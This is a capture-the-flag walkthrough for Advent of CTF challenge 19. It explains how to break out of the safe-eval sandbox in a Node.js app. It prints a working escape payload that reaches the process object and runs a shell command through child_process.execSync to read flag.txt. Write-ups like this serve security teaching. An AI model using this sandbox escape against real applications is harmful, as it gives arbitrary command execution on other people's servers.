Advent of CTF - Challenge 19

“Safe?”

Challenge

This challenge builds on the previous one. The elves upgraded the application with a module to make it safe again.

What you will learn:

  • Bypassing the safe-eval module

Solution

The introduction of this challenge is in ./../challenge-18/index.html. It starts the same, but you will notice that you cannot call any function or standard JavaScript object. Entering any wrong data gives an error message that clearly shows the use of the safe-eval module.

identify-safe-eval.png
Figure 1: Identify safe-eval

Looking at the GitHub page for the project you might notice a currently open issue that states that safe-eval can still be escaped.

github-20201220.png
Figure 2: The open safe-eval issue on GitHub

The issue describes a payload that “exploits” the weakness. On its own it only returns the process object; it does not do anything else yet.

(
    delete(this.constructor.constructor),delete(this.constructor),
    this.constructor.constructor("return process")()
)

Building on it, and with some Node.js payload knowledge and research, a new payload can be constructed.

(
    delete(this.constructor.constructor),
    delete(this.constructor),
    this.constructor.constructor('return process')()
        .mainModule.require('child_process')
        .execSync('cat flag.txt').toString()
)

When you have your points, don’t forget to grab the badge!

badge.png
